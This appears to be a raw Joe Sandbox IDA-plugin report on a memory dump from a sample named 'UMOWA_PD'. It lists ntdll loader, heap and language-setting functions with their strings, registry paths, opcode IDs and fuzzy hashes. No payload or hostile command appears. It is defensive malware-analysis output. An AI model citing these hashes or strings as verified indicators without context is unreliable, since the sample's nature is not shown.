                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 33cd2b90-33cd2b9c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1 33cd2d10-33cd2d1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 250 33d3fdf4-33d3fe16 call 33ce7be4
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 3446177414-1700792311

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1261 33d3f0a5-33d3f0c7 call 33ce7be4
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                    • API String ID: 3446177414-1745908468
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                    • API String ID: 0-3532704233
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 33CBD879
                                                                                      • Part of subcall function 33C94779: RtlDebugPrintTimes.NTDLL ref: 33C94817
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-1975516107
                                                                                    Strings
                                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 33C8D136
                                                                                    • @, xrefs: 33C8D2B3
                                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33C8D06F
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33C8D263
                                                                                    • @, xrefs: 33C8D24F
                                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33C8D0E6
                                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33C8D202
                                                                                    • @, xrefs: 33C8D09D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                    • API String ID: 0-1356375266
                                                                                    Strings
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 33D1880F
                                                                                    • VerifierDebug, xrefs: 33D18925
                                                                                    • HandleTraces, xrefs: 33D1890F
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 33D186BD
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 33D186E7
                                                                                    • VerifierFlags, xrefs: 33D188D0
                                                                                    • VerifierDlls, xrefs: 33D1893D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    Strings
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33CFA79F
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33CFA7AF
                                                                                    • apphelp.dll, xrefs: 33CB2382
                                                                                    • LdrpDynamicShimModule, xrefs: 33CFA7A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-523794902
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-122214566
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33D01F8A
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 33D01F6A, 33D01FA4, 33D01FC4
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33D01FA9
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33D01F82
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 33D01F6F
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33D01FC9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: 5c87289baa2fd20e5ffb8292be49dd4ca2207139a46a2b562e45c4e28318891e
                                                                                    • Instruction ID: 44049a83e938b0184bc28eb11169f89604c8d38640cbe8bdf2119bfd017dc493
                                                                                    • Opcode Fuzzy Hash: 5c87289baa2fd20e5ffb8292be49dd4ca2207139a46a2b562e45c4e28318891e
                                                                                    • Instruction Fuzzy Hash: 4831C4BBE013587FEB109A96DC40F6B7B68DF40B94F0540A9BD10F7262D670AA01CAA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: a49c59a8492d6d49e35ae1f2b1e4d87f61e70e8a1ed4c4fa7c57a77a2b2eb715
                                                                                    • Instruction ID: a9b0ce7843e2413308b40f3a74fc1c5acc50777bc4a0e5a7db9cf17ad06547e5
                                                                                    • Opcode Fuzzy Hash: a49c59a8492d6d49e35ae1f2b1e4d87f61e70e8a1ed4c4fa7c57a77a2b2eb715
                                                                                    • Instruction Fuzzy Hash: A6F1BB75A00706DFEB05CF68C884BAAB7B5FF44384F1481A8E546DB781DB39E981CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 3446177414-2283098728
                                                                                    • Opcode ID: 12fd6d074905b3acd0295a5de500f2f8c2a58e5259330d30eb2be846913dde4f
                                                                                    • Instruction ID: 9d77598bb7ca041558e942b522b7f3aa097f8c1c51fbf241c8039eac0effcd9d
                                                                                    • Opcode Fuzzy Hash: 12fd6d074905b3acd0295a5de500f2f8c2a58e5259330d30eb2be846913dde4f
                                                                                    • Instruction Fuzzy Hash: 85510276A01B029FEB10DF38C884B19B7F5BF84310F19066DE595DFA91EB71A805CB92
                                                                                    APIs
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 33D080F3
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 33D080E9
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 33D080E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 3446177414-1783798831
                                                                                    • Opcode ID: 3c07a75597703d1fb17805d76dbaae56862f8b1a1c21db824c10a5358886f75d
                                                                                    • Instruction ID: 02a57d57cf1af653a29ab71f4066873b6870cb7657258425a6df903c432405de
                                                                                    • Opcode Fuzzy Hash: 3c07a75597703d1fb17805d76dbaae56862f8b1a1c21db824c10a5358886f75d
                                                                                    • Instruction Fuzzy Hash: 2A4117B6910354AFD710EF64DD40B4B77E8EF44B50F05482AF999EB651DB70E802CB92
                                                                                    APIs
                                                                                    Strings
                                                                                    • LdrpCheckRedirection, xrefs: 33D1450F
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33D14508
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 33D14519
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 3446177414-3154609507
                                                                                    • Opcode ID: 0d658c5e3e1c125c1e9ace194b6de125cc82cc5ef308f20852ae3847a5a7a706
                                                                                    • Instruction ID: 9107af233e0e0324a2fbd292c5c143bfe762277eb1c3f1d6b280fc7ab91eeec7
                                                                                    • Opcode Fuzzy Hash: 0d658c5e3e1c125c1e9ace194b6de125cc82cc5ef308f20852ae3847a5a7a706
                                                                                    • Instruction Fuzzy Hash: 4E41D376E047119FDB90CF78E940A1677F8AF48A60F090669EC98DB251DB70E8A09B91
                                                                                    Strings
                                                                                    • Kernel-MUI-Language-SKU, xrefs: 33CB534B
                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 33CB519B
                                                                                    • WindowsExcludedProcs, xrefs: 33CB514A
                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 33CB5167
                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 33CB5272
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                    • API String ID: 0-258546922
                                                                                    • Opcode ID: a6e6e537dcd8d52bebb31c06d4202665347c39be0602af0d3b88e86a1ae2f678
                                                                                    • Instruction ID: 7a751d52295bbdc2d1568b6a904c2d1940f9f94c8c7f508d1727e288b87f0d18
                                                                                    • Opcode Fuzzy Hash: a6e6e537dcd8d52bebb31c06d4202665347c39be0602af0d3b88e86a1ae2f678
                                                                                    • Instruction Fuzzy Hash: 10F14AB6D01619EFDF01CF99C980ADEBBB8FF08650F15406AE501EB611EB719E01CBA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                    • API String ID: 0-3061284088
                                                                                    • Opcode ID: ea48ed8ab585368749fa383d40bb4c1ed9e6183e792dc6fa33499594c70ef6e0
                                                                                    • Instruction ID: 227163b3d63e09b9f0906028d7bb1ac77385ff2f576523cf80b6b81d3cb743b1
                                                                                    • Opcode Fuzzy Hash: ea48ed8ab585368749fa383d40bb4c1ed9e6183e792dc6fa33499594c70ef6e0
                                                                                    • Instruction Fuzzy Hash: 05014C3A416A409EE305A768D448F427BB4EB41739F2D44C9F054CF9A28A99AA41D560
                                                                                    APIs
                                                                                    Strings
                                                                                    • kLsE, xrefs: 33C905FE
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33C90586
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 3446177414-2547482624
                                                                                    • Opcode ID: 99ca16df4a13717e7cdb649d89531d5d3f9442d62edf4111ab982f288c8d02b4
                                                                                    • Instruction ID: 91598995c67bbbfbb1b3845906c3bf9c810e538071ba99692c29c33bd0b88c29
                                                                                    • Opcode Fuzzy Hash: 99ca16df4a13717e7cdb649d89531d5d3f9442d62edf4111ab982f288c8d02b4
                                                                                    • Instruction Fuzzy Hash: CD51DEB5A00756DFFB10EFA5C4406EAB7F8AF04340F06843ED595CB641EB38A505CB65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 7bc41b0d04a6e348873fbbf6811277005fc90fd969c06b4a21f6a254227e005f
                                                                                    • Instruction ID: 0cb9dc2d39d4da1ebe47abe4809b84fb02f2033cfe2e6e5a7d434984a77134ab
                                                                                    • Opcode Fuzzy Hash: 7bc41b0d04a6e348873fbbf6811277005fc90fd969c06b4a21f6a254227e005f
                                                                                    • Instruction Fuzzy Hash: 9CC18878608782CFE711CF19C440B9AB7E4FF88744F06896AF895CB650EB35C94ACB56
                                                                                    Strings
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33D01FE3, 33D020BB
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 33D020C0
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 33D01FE8
                                                                                    • .Local, xrefs: 33CC27F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 4984f9a62e3fef20c6a156953ae02eed30f2d4e194e1ec01eb66b637ac080ec8
                                                                                    • Instruction ID: 8f6b00a1d2a51dce3812c6ab60891d06fc083e3f54048e2af5f89f3bfc25ca53
                                                                                    • Opcode Fuzzy Hash: 4984f9a62e3fef20c6a156953ae02eed30f2d4e194e1ec01eb66b637ac080ec8
                                                                                    • Instruction Fuzzy Hash: 9CA1AC76D0136A9BDB20CF64D884B99B3B5BF58754F1501EAD848EB261DB309E82CF90
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33CF0E72
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33CF0EB5
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33CF0DEC
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33CF0E2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 886eb83c02093211f8cc33fc0916ef384ec9b0195a5199920b6e57c4f5f54709
                                                                                    • Instruction ID: ab159697a77e9ac9e9e80ec3d454f30670b39a0ae4f7179118dc545748aaee23
                                                                                    • Opcode Fuzzy Hash: 886eb83c02093211f8cc33fc0916ef384ec9b0195a5199920b6e57c4f5f54709
                                                                                    • Instruction Fuzzy Hash: AF71CEB1904704DFE790DF54C884B8B7BA8EF847A4F450868F988CB696D734E598CBD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                    • API String ID: 0-2586055223
                                                                                    • Opcode ID: 562d18edd6dc46842d9aca6f48fe287103c5f417ffe9b7888adbcd0829308847
                                                                                    • Instruction ID: 5832ee302b85019801db18c9f5df5ed24e809af59c2d6c3b491609ea37244d85
                                                                                    • Opcode Fuzzy Hash: 562d18edd6dc46842d9aca6f48fe287103c5f417ffe9b7888adbcd0829308847
                                                                                    • Instruction Fuzzy Hash: A861D075604781AFE312CF64D844F57B7E8EF84798F090659F9A4CF6A1CA34E940CB62
                                                                                    Strings
                                                                                    Memory Dump Source
